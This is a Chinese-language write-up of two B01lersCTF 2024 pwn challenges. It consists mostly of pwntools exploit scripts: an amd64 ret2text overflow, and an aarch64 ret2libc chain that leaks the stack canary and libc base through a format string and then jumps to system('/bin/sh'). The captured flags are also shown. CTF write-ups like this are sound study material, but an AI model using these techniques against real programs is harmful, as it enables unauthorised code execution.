387 字
2 分钟
B01lersCTF 2024
pwn
shall-we-play-a-game
ret2text,没有什么好说的
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file = './shall-we-play-a-game'
elf = ELF(file)
p = process(file)
link = 'gold.b01le.rs 4004'.split()
# p = remote(link[0], link[1])
pa = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : p.recv(numb=m, timeout=t)
ru = lambda x : p.recvuntil(x)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
sl(b'1')
sl(b'1')
sl(b'1')
sl(cyclic(0x40+0x8)+p64(elf.sym.global_thermo_nuclear_war))
ia()
#bctf{h0w_@bo0ut_a_n1ce_g@m3_0f_ch3ss?_ccb7a268f1324c84}arm-and-a-leg
第一道armpwn
很走运,这次刚好本地环境是22.04,和云端相同24马上就要出了,下次就不一定有这么好运气了
一道ret2libc,但是有canary。由于armpwn不像x86/x64那样有较多的gadget可用,只能像打ret2csu一样,最后还是在libc找的gadget。
from pwn import *
context(arch='aarch64', os='linux')
# context.log_level='debug'
file = './arm-and-a-leg'
elf = ELF(file)
libc = ELF('./libc.so.6_arm22')
link = 'arm-and-a-leg.gold.b01le.rs 1337'.split()
p = remote(link[0], link[1])
pa = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : p.recv(numb=m, timeout=t)
ru = lambda x : p.recvuntil(x)
rl = lambda : p.recvline()
sd = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
ia = lambda : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa = lambda a, b : p.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
sl(b'1')
sl(b'1337')
sl(b'%15$p-%21$phere')
ru(b'we will ship to: ')
addr = p.recvuntil(b'here', drop=1).split(b'-')
canary = int(addr[0],16)
libc_base = int(addr[1],16)-0x274cc
s('canary: %s, libc_base: %s'%(hex(canary), hex(libc_base)))
# 0x0000000000046d64 : ldp x21, x30, [sp, #0x10] ; ldp x19, x20, [sp], #0x30 ; ret
# 0x00000000000e3720 : mov x0, x20 ; blr x21
system = libc_base + libc.sym.system
gadget1 = libc_base + 0x0000000000046d64
gadget2 = libc_base + 0x00000000000e3720
binsh = libc_base + 0x00014CD10
exp = flat(
p64(canary)*15, # padding 120, 懒得调全用canary填了
p64(gadget1),
p64(canary)*3,
p64(binsh),
p64(system),
p64(gadget2)
)
print(len(exp))
sl(exp)
ia()
# bctf{c0st_y@_@n_ARM_@nd_a_l3g!_a1659d0e634100240e6}B01lersCTF 2024
https://m0rn1ng.pages.dev/posts/b01lersctf-2024/